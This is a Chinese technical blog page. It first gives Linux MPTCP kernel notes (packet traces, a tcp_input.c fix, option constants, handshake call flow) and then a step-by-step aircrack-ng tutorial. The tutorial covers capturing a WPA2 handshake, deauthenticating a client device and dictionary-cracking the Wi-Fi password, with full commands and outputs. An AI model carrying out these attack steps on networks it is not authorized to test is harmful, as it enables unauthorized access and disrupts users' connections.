kk Blog —— 通用基础


date [-d @int|str] [+%s|"+%F %T"]
netstat -ltunp

MPTCP 回复一样的option

对方回复一模一样的option

例如

curl ksurl.cn

1
2
3
4
5
6
7
8
9
10
11

01:42:57.092471 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [S], seq 846976861, win 64240, options [mss 1460,nop,nop,sackOK,nop,wscale 7,mptcp capable csum {0xc7c6d84045bd8248}], length 0
01:42:57.130413 IP 103.102.200.3.80 > 192.168.8.162.34366: Flags [S.], seq 668917669, ack 846976862, win 0, options [mss 1452,nop,nop,sackOK,nop,nop,nop,nop,mptcp capable csum {0xc7c6d84045bd8248}], length 0
01:42:57.130498 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [.], ack 1, win 64240, options [mptcp capable csum {0xc7c6d84045bd8248,0xc7c6d84045bd8248},mptcp dss ack 1200875982], length 0
01:42:57.130525 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [.], ack 1, win 64240, options [mptcp add-addr id 3 11.0.0.1,mptcp dss ack 1200875982], length 0
01:42:57.616370 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [.], ack 1, win 64240, options [mptcp dss ack 1200875982], length 0
01:42:57.654157 IP 103.102.200.3.80 > 192.168.8.162.34366: Flags [.], ack 1, win 29200, length 0
01:42:58.612344 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [.], ack 1, win 64240, options [mptcp dss ack 1200875982], length 0
01:42:58.650740 IP 103.102.200.3.80 > 192.168.8.162.34366: Flags [.], ack 1, win 29200, length 0
01:43:00.560359 IP 192.168.8.162.34366 > 103.102.200.3.80: Flags [.], ack 1, win 64240, options [mptcp dss ack 1200875982], length 0
01:43:00.598942 IP 103.102.200.3.80 > 192.168.8.162.34366: Flags [.], ack 1, win 29200, length 0
...

修复

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16

diff --git a/src/4.15.18/tcp_input.c b/src/4.15.18/tcp_input.c
index 1c36791..397cb89 100644
--- a/src/4.15.18/tcp_input.c
+++ b/src/4.15.18/tcp_input.c
@@ -5845,6 +5845,11 @@ static int tcp_rcv_synsent_state_process(struct sock *sk, struct sk_buff *skb,
                if (tp->request_mptcp || mptcp(tp)) {
                        int ret;
 
+                       if (!mptcp(tp) && mopt.saw_mpc) {
+                               struct tcp_sock *meta_tp = tcp_sk(sk);
+                               if (meta_tp->mptcp_loc_key == mopt.mptcp_sender_key)
+                                       mopt.saw_mpc = 0;
+                       }
                        rcu_read_lock();
                        local_bh_disable();
                        ret = mptcp_rcv_synsent_state_process(sk, &sk,

修复后

curl ksurl.cn

1
2
3
4
5
6
7
8
9
10
11

01:48:11.136480 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [S], seq 1334883078, win 65320, options [mss 1420,nop,nop,sackOK,nop,wscale 7,mptcp capable csum {0xa48a1610f304b3a}], length 0
01:48:11.174632 IP 103.102.200.3.80 > 192.168.8.162.34388: Flags [S.], seq 2018132645, ack 1334883079, win 0, options [mss 1420,nop,nop,sackOK,nop,nop,nop,nop,mptcp capable csum {0xa48a1610f304b3a}], length 0
01:48:11.174720 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [.], ack 1, win 65320, length 0
01:48:11.213236 IP 103.102.200.3.80 > 192.168.8.162.34388: Flags [.], ack 1, win 29200, length 0
01:48:11.213283 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [P.], seq 1:73, ack 1, win 65320, length 72: HTTP: GET / HTTP/1.1
01:48:11.252192 IP 103.102.200.3.80 > 192.168.8.162.34388: Flags [.], ack 73, win 29200, length 0
01:48:11.253261 IP 103.102.200.3.80 > 192.168.8.162.34388: Flags [P.], seq 1:397, ack 73, win 29200, length 396: HTTP: HTTP/1.1 302 Moved Temporarily
01:48:11.253300 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [.], ack 397, win 64924, length 0
01:48:11.253541 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [F.], seq 73, ack 397, win 64924, length 0
01:48:11.292118 IP 103.102.200.3.80 > 192.168.8.162.34388: Flags [F.], seq 397, ack 74, win 29200, length 0
01:48:11.292182 IP 192.168.8.162.34388 > 103.102.200.3.80: Flags [.], ack 398, win 64923, length 0

MPTCP_OPTION

解析见 mptcp_parse_options()

MPTCP_SUB_CAPABLE

1
2
3
4
5

#define MPTCP_SUB_CAPABLE                       0
#define MPTCP_SUB_LEN_CAPABLE_SYN               12
#define MPTCP_SUB_LEN_CAPABLE_SYN_ALIGN         12
#define MPTCP_SUB_LEN_CAPABLE_ACK               20
#define MPTCP_SUB_LEN_CAPABLE_ACK_ALIGN         20

最初的三次握手时用

MPTCP_SUB_JOIN

1
2
3
4
5
6
7

#define MPTCP_SUB_JOIN                  1
#define MPTCP_SUB_LEN_JOIN_SYN          12
#define MPTCP_SUB_LEN_JOIN_SYN_ALIGN    12
#define MPTCP_SUB_LEN_JOIN_SYNACK       16
#define MPTCP_SUB_LEN_JOIN_SYNACK_ALIGN 16
#define MPTCP_SUB_LEN_JOIN_ACK          24
#define MPTCP_SUB_LEN_JOIN_ACK_ALIGN    24

第二次、第三次、。。。握手时用

MPTCP_SUB_DSS

1

#define MPTCP_SUB_DSS           2

MPTCP_SUB_ADD_ADDR, MPTCP_SUB_REMOVE_ADDR

1
2
3
4
5
6
7
8
9
10
11
12

#define MPTCP_SUB_ADD_ADDR              3
#define MPTCP_SUB_LEN_ADD_ADDR4         8
#define MPTCP_SUB_LEN_ADD_ADDR4_VER1    16
#define MPTCP_SUB_LEN_ADD_ADDR6         20
#define MPTCP_SUB_LEN_ADD_ADDR6_VER1    28
#define MPTCP_SUB_LEN_ADD_ADDR4_ALIGN   8
#define MPTCP_SUB_LEN_ADD_ADDR4_ALIGN_VER1      16
#define MPTCP_SUB_LEN_ADD_ADDR6_ALIGN   20
#define MPTCP_SUB_LEN_ADD_ADDR6_ALIGN_VER1      28

#define MPTCP_SUB_REMOVE_ADDR   4
#define MPTCP_SUB_LEN_REMOVE_ADDR       4

fullmesh 模式通告ip

MPTCP_SUB_PRIO

1
2
3
4

#define MPTCP_SUB_PRIO          5
#define MPTCP_SUB_LEN_PRIO      3
#define MPTCP_SUB_LEN_PRIO_ADDR 4
#define MPTCP_SUB_LEN_PRIO_ALIGN        4

./ip/ip link set dev enp0s3 multipath off/on/backup

backup命令就是将该接口设置为backup模式,并且会通过PRIO option通知对方,两边会标记low_prio、rcv_low_prio。但目前所有pm都没有用到low_prio。

MPTCP_SUB_FAIL

1
2
3

#define MPTCP_SUB_FAIL          6
#define MPTCP_SUB_LEN_FAIL      12 
#define MPTCP_SUB_LEN_FAIL_ALIGN        12

MPTCP_SUB_FCLOSE

1
2
3

#define MPTCP_SUB_FCLOSE        7
#define MPTCP_SUB_LEN_FCLOSE    12
#define MPTCP_SUB_LEN_FCLOSE_ALIGN      12

MPTCP_VERSION

mptcp_version

只有两个版本 v0、v1

v1: 在option=MPTCP_SUB_ADD_ADDR 时需要加密,收包时在 mptcp_handle_add_addr 验证。

v0: 没有加密

mptcp建连过程

创建 socket

1
2
3
4
5
6
7

inet_create
	tcp_v4_init_sock
		tcp_init_sock
			mptcp_init_tcp_sock {
				if (!mptcp_init_failed && sysctl_mptcp_enabled == MPTCP_SYSCTL)
					mptcp_enable_sock(sk);
			}

所以listen之后再设置mptcp_enable=0,需要restart才能生效

发送syn

只加 option

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15

tcp_connect {
	tcp_connect_init {
		tp->request_mptcp = 1;
	}
	tcp_transmit_skb
		tcp_syn_options
			mptcp_syn_options {
				if (is_master_tp(tp)) {
					opts->mptcp_options |= OPTION_MP_CAPABLE | OPTION_TYPE_SYN;
					...
				} else {
					opts->mptcp_options |= OPTION_MP_JOIN | OPTION_TYPE_SYN;
				}
			}
}

接收syn, 发送synack

只加 option

1
2
3
4
5
6
7
8
9

tcp_synack_options
	mptcp_synack_options {
		/* MPCB not yet set - thus it's a new MPTCP-session */
		if (!mtreq->is_sub) {
			opts->mptcp_options |= OPTION_MP_CAPABLE | OPTION_TYPE_SYNACK;
		} else {
			opts->mptcp_options |= OPTION_MP_JOIN | OPTION_TYPE_SYNACK;
		}
	}

接收synack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28

tcp_v4_do_rcv {
	sk->sk_state == TCP_SYN_SENT

	tcp_rcv_state_process {
		queued = tcp_rcv_synsent_state_process(sk, skb, th, len) {

			if (tp->request_mptcp || mptcp(tp)) {
				ret = mptcp_rcv_synsent_state_process(sk, &sk, skb, &mopt);
				// 这个会创建出一个新的sk叫master_sk,原来的sk改为meta_sk
				// master_sk 和 meta_sk 的五元组一样,meta_sk 从hash表中删去,master_sk 加入hash表
				// 也就是说,和应用层通信的是meta_sk,tcp通信用master_sk
			}

			tcp_set_state(sk, TCP_ESTABLISHED);

			tcp_send_ack(sk) {
				mptcp_established_options {
					if (unlikely(tp->mptcp->include_mpc)) {
						opts->mptcp_options |= OPTION_MP_CAPABLE | OPTION_TYPE_ACK;
					}
			}
		}
		if (is_meta_sk(sk)) {
			mptcp_update_metasocket(tp->meta_sk);
			// 客户端建连成功
		}
	}
}

接收ack

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31

tcp_child_process {
	tcp_rcv_state_process {

		if (!tcp_validate_incoming(sk, skb, th, 0))
			return 0;

		/* step 5: check the ACK field */
		if (th->ack) {
			int acceptable = tcp_ack(sk, skb, FLAG_SLOWPATH) > 0;

			switch (sk->sk_state) {
				case TCP_SYN_RECV:

				tcp_set_state(sk, TCP_ESTABLISHED);

			}

			case TCP_ESTABLISHED:
				tcp_data_queue(sk, skb);
				queued = 1;
				break;
			}

		}

		if (mptcp(tp)) {
			if (is_master_tp(tp)) {
				mptcp_update_metasocket(mptcp_meta_sk(sk));
				// 服务端建连成功
			}
	}

aircrack-ng 破解WIFI密码

  • 限制条件:监听时需要有用户成功连接WIFI

https://github.com/conwnet/wpa-dictionary

安装 aircrack-ng

1

sudo apt install aircrack-ng

查看可用的无线网卡

1

sudo airmon-ng

指定无线网卡开启监听模式

1

sudo airmon-ng start wlp8s0

开启后名字是 wlp8s0mon

开启监听模式后无线网卡无法继续连接 wifi,使用后需要关闭监听模式。

扫描附近的无线网络

1
2
3
4
5
6
7

$ sudo airodump-ng wlp8s0mon
CH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49              

 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 22:47:DA:62:2A:F0  -50       51       12    0   6  54e. WPA2 CCMP   PSK  AndroidAP    
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe                                  
 22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -31    0 -24e     0       16

这一步会输出两个列表,两个列表不停在刷新。

第一个列表表示扫描到的无线网络 AP 信息,会用到以下几列信息:

1
2
3
4
5

BSSID: 无线 AP 的硬件地址
PWR: 信号强度,值是负数,绝对值越小表示信号越强
CH: 无线网络信道
ENC: 加密方式,我们要破解的是 WPA2
ESSID: 无线网络的名称

第二个列表表示某个无线网络中和用户设备的连接信息:

1
2

BSSID: 无线 AP 的硬件地址
STATION: 用户设备的硬件地址

扫描列表会不停刷新,确定最终目标后按 Ctrl-C 退出。

使用参数过滤扫描列表,确定扫描目标

1
2
3
4
5
6
7
8
9
10

使用命令:airodump-ng -w <扫描结果保存的文件名> -c <无线网络信道> --bssid <目标无线 AP 的硬件地址> <处于监听模式的网卡名称>

sudo airodump-ng -w android -c 6 --bssid 22:47:DA:62:2A:F0 wlp8s0mon


CH  5 ][ Elapsed: 12 s ][ 2018-10-07 18:49 ][ WPA handshake: 22:47:DA:62:2A:F0
 BSSID              PWR  Beacons    #Data, #/s  CH  MB   ENC  CIPHER AUTH ESSID
 22:47:DA:62:2A:F0  -33 100     1597      387   11   6  54e. WPA2 CCMP   PSK  AndroidAP
 BSSID              STATION            PWR   Rate    Lost    Frames  Probe
 22:47:DA:62:2A:F0  AC:BC:32:96:31:8D  -32    1e-24e  1691     2657

刚扫描时看到输出的扫描状态是这样的:CH 5 ][ Elapsed: 12 s ][ 2018-10-07 18:49

只有当扫描状态后面出现 ][ WPA handshake: 22:47:DA:62:2A:F0 后,我们才拿到拿到进行破解的握手包。

扫描过程中如果有用户设备尝试连接 Wi-Fi 时,我们就会拿到握手包。

所以我们可以同时使用 aireplay-ng 对目标设备进行攻击,使其掉线重新连接,这样我们就拿到了握手包。

拿到握手包后按 Ctrl-C 结束扫描即可。

使用 aireplay-ng 对目标设备发起攻击

1
2
3
4
5
6
7
8

使用命令:aireplay-ng -<攻击模式> <攻击次数> -a 无线 AP 硬件地址> -c <用户设备硬件地址> <处于监听模式的网卡名称>

$ sudo aireplay-ng -0 0 -a 22:47:DA:62:2A:F0 -c AC:BC:32:96:31:8D wlp8s0mon
18:57:31  Waiting for beacon frame (BSSID: 22:47:DA:62:2A:F0) on channel 6
18:57:32  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [41|64 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [19|121 ACKs]
18:57:33  Sending 64 directed DeAuth. STMAC: [AC:BC:32:96:31:8D] [11|80 ACKs]
...

发起攻击后,当 airodump-ng 成功拿到了握手包,使用 Ctrl-C 退出攻击。

使用 aircrack-ng 暴力破解 Wi-Fi 密码

破解是本地操作,无需网络。

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33

使用命令:aircrack-ng -w 密码字典 <包含握手包的 cap 文件>

$ aircrack-ng -w wpa-dictionary/common.txt android-01.cap 
Opening android-01.cap
Read 675 packets.

   #  BSSID              ESSID                     Encryption

   1  22:47:DA:62:2A:F0  AndroidAP                 WPA (1 handshake)

Choosing first network as target.

Opening android-01.cap
Reading packets, please wait...

                                 Aircrack-ng 1.2 rc4

      [00:00:00] 12/2492 keys tested (828.33 k/s) 

      Time left: 2 seconds                                       0.48%

                          KEY FOUND! [ 1234567890 ]


      Master Key     : A8 70 17 C2 C4 94 12 99 98 4B BB BE 41 23 5C 0D 
                       4A 3D 62 55 85 64 B2 10 11 79 6C 41 1A A2 3B D3 

      Transient Key  : 58 9D 0D 25 26 81 A9 8E A8 24 AB 1F 40 1A D9 ED 
                       EE 10 17 75 F9 F1 01 EE E3 22 A5 09 54 A8 1D E7 
                       28 76 8A 6C 9E FC D3 59 22 B7 82 4E C8 19 62 D9 
                       F3 12 A0 1D E9 A4 7C 4B 85 AF 26 C5 BA 22 42 9A 

      EAPOL HMAC     : 22 C1 BD A7 BB F4 12 A5 92 F6 30 5C F5 D4 EE BE

无线网卡退出监听模式

1

sudo airmon-ng stop wlp8s0mon